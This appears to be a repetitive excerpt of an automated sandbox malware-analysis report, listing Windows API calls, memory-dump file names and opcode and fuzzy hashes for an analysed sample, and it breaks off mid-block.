                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: BuffCharLower
                                                • String ID:
                                                • API String ID: 2358735015-0
                                                • Opcode ID: 7d14c30395ae0310bc29ce3ab2295d34cb5f47a6facfede9adb47060cdae6735
                                                • Instruction ID: 2a210f58e41bf13d4d2442f8ac3352230c0cc3e9164c4319b8f3a01e157a8cdc
                                                • Opcode Fuzzy Hash: 7d14c30395ae0310bc29ce3ab2295d34cb5f47a6facfede9adb47060cdae6735
                                                • Instruction Fuzzy Hash: 8541A5B7500209AFCB26EF64D8819AEB7B9EF44314B11853FE9179B251EB70DE44CB50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: a0dc4ba49f99a06ab1d31dd1899a480250dd06a0c7cbd913f4d5e337f0bee32c
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 6531D370A00106DFDB1ADF59C480A69F7A6FB59300B6586A5E40ACB756E732EDC1CBD0
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 003E8EBE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FullNamePathPrivateProfileString
                                                • String ID:
                                                • API String ID: 1991638491-0
                                                • Opcode ID: d801e26b4b383c65a4bcfa0cfb75cff4e5f573c5cf49b909debe64a1ec33daa6
                                                • Instruction ID: e2e23645685a2ba7f37df2517f79ec26b20915f61f26f0c0f323b457c93792e7
                                                • Opcode Fuzzy Hash: d801e26b4b383c65a4bcfa0cfb75cff4e5f573c5cf49b909debe64a1ec33daa6
                                                • Instruction Fuzzy Hash: 01212179600615AFCB16EB64C946CAEB7B5EF49760B048058F94A6F3B1CB34FD41CB90
                                                APIs
                                                  • Part of subcall function 00376332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0037637F,?,?,003760AA,?,00000001,?,?,00000000), ref: 0037633E
                                                  • Part of subcall function 00376332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00376350
                                                  • Part of subcall function 00376332: FreeLibrary.KERNEL32(00000000,?,?,0037637F,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376362
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003760AA,?,00000001,?,?,00000000), ref: 0037639F
                                                  • Part of subcall function 003762FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003B54C3,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376304
                                                  • Part of subcall function 003762FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00376316
                                                  • Part of subcall function 003762FB: FreeLibrary.KERNEL32(00000000,?,?,003B54C3,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376329
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressFreeProc
                                                • String ID:
                                                • API String ID: 2632591731-0
                                                • Opcode ID: 16c2da2f4e90865d416d76620a209563c86524d3d04f0ad39b15c41757f0fadd
                                                • Instruction ID: 3812f4f67ee16d1c667495b49e94634a901fbe9128ae5bbbe67bf492da006468
                                                • Opcode Fuzzy Hash: 16c2da2f4e90865d416d76620a209563c86524d3d04f0ad39b15c41757f0fadd
                                                • Instruction Fuzzy Hash: 85115731600A04AADB22FB21C813BAD73A59F50721F20C42DF446AE0D2DFB89A45D750
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: __wsopen_s
                                                • String ID:
                                                • API String ID: 3347428461-0
                                                • Opcode ID: 2986f2c8beacfa8fe1ca5c7103efe9efd087bc7131cc19275a6237507e8f95d5
                                                • Instruction ID: 076b8228759d9eb11423e42a53e76cd0b27239bdcff79a5d0932db3fb1a1bd59
                                                • Opcode Fuzzy Hash: 2986f2c8beacfa8fe1ca5c7103efe9efd087bc7131cc19275a6237507e8f95d5
                                                • Instruction Fuzzy Hash: 8211487590410AAFCB06DF58E94099E7BF9EF49310F114069F809AB311DA31EA118BA4
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00376B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0037B0AC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: b451dde37af23f18a68ff2d47d34311a09cd88044757df8ee344efe7b83743ac
                                                • Instruction ID: 1d765deacb10fd0539ddc27c5286cd254e483bfeaef120c60c5bf0dc90334b57
                                                • Opcode Fuzzy Hash: b451dde37af23f18a68ff2d47d34311a09cd88044757df8ee344efe7b83743ac
                                                • Instruction Fuzzy Hash: 9D113631200705DFD7328E15C880B67F7F9EF44364F10C42EE9AA8BA50C7B5A945CB60
                                                APIs
                                                  • Part of subcall function 003A500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,003A31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 003A504E
                                                • _free.LIBCMT ref: 003A53FC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                                • Instruction ID: e2a3c3d5b1fdd60ff0999a2ea846726089f06019787365c6f1adbc1c47cde0bd
                                                • Opcode Fuzzy Hash: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                                • Instruction Fuzzy Hash: 670149B72047056BE722CF69D845A5AFBDCEBCA370F26061DE1D4972C0EA70A805CB74
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                • Instruction ID: 7382e7a888fa3dc1934ab48d38fcac0374b0d4ab391e636d508b24e7398c4f5d
                                                • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                • Instruction Fuzzy Hash: 74F0A432501A205ADF237A6A9C06B6A3798DF43335F150B15F8669A1D1DF78DC0286A1
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,003A31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 003A504E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 4eb4e77878e37567c899eb3a78d96a22208621dc0296e3cd08d9893b4c026fcc
                                                • Instruction ID: 57ebb1d154d96b6990a00ad9e208b9b66774d3eba63b93d8d5dc8c2cc261eb05
                                                • Opcode Fuzzy Hash: 4eb4e77878e37567c899eb3a78d96a22208621dc0296e3cd08d9893b4c026fcc
                                                • Instruction Fuzzy Hash: 74F08231A05E246BDF33AF629C05F5A3768FF637B1B1A8125FD15EA190CA74D84086E0
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00396A99,?,0000015D,?,?,?,?,003985D0,000000FF,00000000,?,?), ref: 003A3BE2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 3d3fe0b58be90161b5ad9fc57275f7e68e649c8b9c181e1cc0a9b4634603badc
                                                • Instruction ID: 08e578853a36f440c3213221551ec89ca0a0f1fd427553d695cde92a611fec98
                                                • Opcode Fuzzy Hash: 3d3fe0b58be90161b5ad9fc57275f7e68e649c8b9c181e1cc0a9b4634603badc
                                                • Instruction Fuzzy Hash: A4E065316056155BDB232B769D05F5A365ADB437E0F260121FC45DA090DB71DD4082F5
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b27793a1ae50f9303f55a2f756c837aed5197c91645e2b39687a2a2f4a17e8c2
                                                • Instruction ID: c7863f2780d9c057d662bcfc4b9084fb2a4a1f76719422d8dc6b882e3c470193
                                                • Opcode Fuzzy Hash: b27793a1ae50f9303f55a2f756c837aed5197c91645e2b39687a2a2f4a17e8c2
                                                • Instruction Fuzzy Hash: 60F0A971101B02CFCB368F60D4A1852BBE8FF0132A324893EE2DB82A20C731A840CF10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: d8f2f3f4bb0e9c2fbc10885302738f1e4dc054b8e791ebfefaeddae2cb0582d6
                                                • Instruction ID: abe7075269bfd2ecec6f64b94c75dd6dcbc86e1ee8ae3c34b05db4e4c7cfb651
                                                • Opcode Fuzzy Hash: d8f2f3f4bb0e9c2fbc10885302738f1e4dc054b8e791ebfefaeddae2cb0582d6
                                                • Instruction Fuzzy Hash: FCF0E5B1B046005AD7226A74980AFA2B7ECAB00315F24885ED4C5C2281C7B158945792
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                • Instruction ID: 6e311fba07fd90d74a97164dfb1bbc5c2a01ac93763769d80b1f96378e521fa6
                                                • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                • Instruction Fuzzy Hash: B4F0F87140420DFFDF05DF90C941E9E7B79FB05318F208445F9199A151D336DA21EBA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID:
                                                • API String ID: 176396367-0
                                                • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                • Instruction ID: d21fe0207187ce21b9e2fa5d7e4f36555491b854051dfbb1916921af3e3ed398
                                                • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                • Instruction Fuzzy Hash: E7D052223420203AAA6A213D2D0BC7F891CCBC2AA0B04007EFA02CE1AAE8444C0302A0
                                                APIs
                                                • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 003DE7A2
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: NamePathShort_wcslen
                                                • String ID:
                                                • API String ID: 2021730007-0
                                                • Opcode ID: 6259a55f3898d6b62a047f1b6243f50a01de8980e7eed63e972c69fa021a2b93
                                                • Instruction ID: cbb1e62147bc18e233c850b68d95edf71e03afc04560d00b9bcc92106bec18df
                                                • Opcode Fuzzy Hash: 6259a55f3898d6b62a047f1b6243f50a01de8980e7eed63e972c69fa021a2b93
                                                • Instruction Fuzzy Hash: 2EE0CD7694022457C721939C9C05FDA77DDEFC8790F0441B4FD09DB248DDA4DD808590
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,0037B0DE,?,?,00000000,?,00376B73,?), ref: 0038F156
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: af8e5367288cdf3a5d45755d01c5b6087470c88dd2f787e6b3bef861912416fd
                                                • Instruction ID: 0d2864a6156a287aa42c1d926c2dc5f5831262e7bf6e20517427bb445d511816
                                                • Opcode Fuzzy Hash: af8e5367288cdf3a5d45755d01c5b6087470c88dd2f787e6b3bef861912416fd
                                                • Instruction Fuzzy Hash: 64E092B5910704AFD728DF55D846D97BBF8EB08310B00456EA85697740E7B1BD448B50
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003739FD
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: LongNamePath_wcslen
                                                • String ID:
                                                • API String ID: 541455249-0
                                                • Opcode ID: 386af84144545272eaedd580f0801a7e28bfadbbb598bfbf525722651247f41e
                                                • Instruction ID: 05d961022679e4f420a36ac327e7eb71425054e4b2f89e99d62ceb2540273e4a
                                                • Opcode Fuzzy Hash: 386af84144545272eaedd580f0801a7e28bfadbbb598bfbf525722651247f41e
                                                • Instruction Fuzzy Hash: 36E0CD7290012457C721939C9C05FDA77DDDFC8790F0441B5FD09DB248DDB4DD808590
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003DE76C
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FolderPath_wcslen
                                                • String ID:
                                                • API String ID: 2987691875-0
                                                • Opcode ID: da3885f3d38a7f82a058b0bd368753bda5a5a9b9685c01d9d0406417fb3a23ef
                                                • Instruction ID: 0997f7fcc97a1c910bc591568df1578d81f0920d8d7669f86698ce17239c537e
                                                • Opcode Fuzzy Hash: da3885f3d38a7f82a058b0bd368753bda5a5a9b9685c01d9d0406417fb3a23ef
                                                • Instruction Fuzzy Hash: 8BD05EA19002282BDF60A7B99D0DDB73AACD740210F0046A0786DD3142E974ED448AA0
                                                APIs
                                                • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,003DD9DC,?,?), ref: 003DDA72
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CopyFile
                                                • String ID:
                                                • API String ID: 1304948518-0
                                                • Opcode ID: 0c47462d0ddf0bac4e88db843d25a4570da5d145de6f8d2762d3360bda05a3d2
                                                • Instruction ID: 35ecfcf648b3e7f9fe7abf7599698a11afc3539cdc03a5e549165e7871559a98
                                                • Opcode Fuzzy Hash: 0c47462d0ddf0bac4e88db843d25a4570da5d145de6f8d2762d3360bda05a3d2
                                                • Instruction Fuzzy Hash: 0BD0A7305D0208BBEF108B90CD03F99B76CE711B45F1041A4B101EA0D0C7B5A5089724
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,00000000,?,003B0AA4,?,?,00000000,?,003B0AA4,00000000,0000000C), ref: 003B0757
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
